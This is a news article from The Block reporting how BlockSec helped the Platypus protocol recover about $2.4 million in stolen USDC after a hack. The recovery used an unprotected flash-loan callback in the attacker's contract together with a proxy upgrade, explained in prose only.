Platypus salvages $2.4 million in hacked funds with BlockSec's help

Quick Take

  • The hacker who exploited Platypus only made off with a small portion of the initially stolen funds.
  • Blockchain security firm BlockSec found a loophole in the attacker’s contract and called back $2.4 million into Platypus’ address with an upgrade proxy implementation.

After the Platypus protocol was hacked yesterday, at least $2.4 million in USDC stablecoin was returned to the exploited platform with help from blockchain security firm BlockSec.

Of the almost $9.1 million in stolen funds from Platypus, it was revealed that the attacker could only cash out $270,000, according to MetaSleuth, a visualization tool from Blocksec.

Some $8.5 million of stolen funds are frozen in the contract they were transferred to, and another $380,000 from a second attempted exploit were accidentally sent back to Aave, on-chain data show.

Retrieving a portion of the stolen funds for Platypus revolved around BlockSec’s plan to take advantage of a loophole in the attacker’s contract.

“By leveraging this loophole, the project can transfer the funds from the attacker contract to the project's account,” Yajin Zhou, co-founder of BlockSec told The Block.

"The project recovered $2 million using the proof of concept provided by us. This was to recover the funds in the attacker's contract,” according to Zhou, who added that some $8 million in assets were stranded since the attacker contract lacks a transfer function.

THE SCOOP

Keep up with the latest news, trends, charts and views on crypto and DeFi with a new biweekly newsletter from The Block's Frank Chaparro

By signing-up you agree to our Terms of Service and Privacy Policy
By signing-up you agree to our Terms of Service and Privacy Policy

Callback the hack

To get back the crypto, BlockSec used a callback function in the attacker’s contract.

"The attack was launched through the flash loan callback interface in the attack contract. This callback function has no access control. And during this callback function, the attacker hardcoded the logic to approve USDC to the project’s contract (which is a proxy),” Zhou noted.

“So the project can first invoke the callback function in the attacker contract to approve USDC to the project’s contract. Then the project contract can withdraw the USDC from the attacker contract by upgrading the proxy to a new implementation," said Zhou.

Correction: Updated to correct Platypus' formal name. 


© 2023 The Block. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.

About Authors

Jeremy Nation is a senior reporter at The Block covering the greater blockchain ecosystem. Prior to joining The Block, Jeremy worked as a product content specialist at Bullish and Block.one. He also served as a reporter for ETHNews. Follow him on Twitter @ETH_Nation.
Vishal Chawla is The Block’s crypto ecosystems editor and has spent over six years covering tech protocols, cybersecurity, artificial intelligence and cloud computing. Vishal likes to delve deep into blockchain intricacies to ensure readers are well-informed about the continuously evolving crypto landscape. He is also a staunch advocate for rigorous security practices in the space. Before joining The Block, Vishal held positions at IDG ComputerWorld, CIO, and Crypto Briefing. He can be reached on Twitter at @vishal4c and via email at [email protected]

Editor

To contact the editors of this story:
Madhu Unnikrishnan at
[email protected]
Larry DiTore at
[email protected]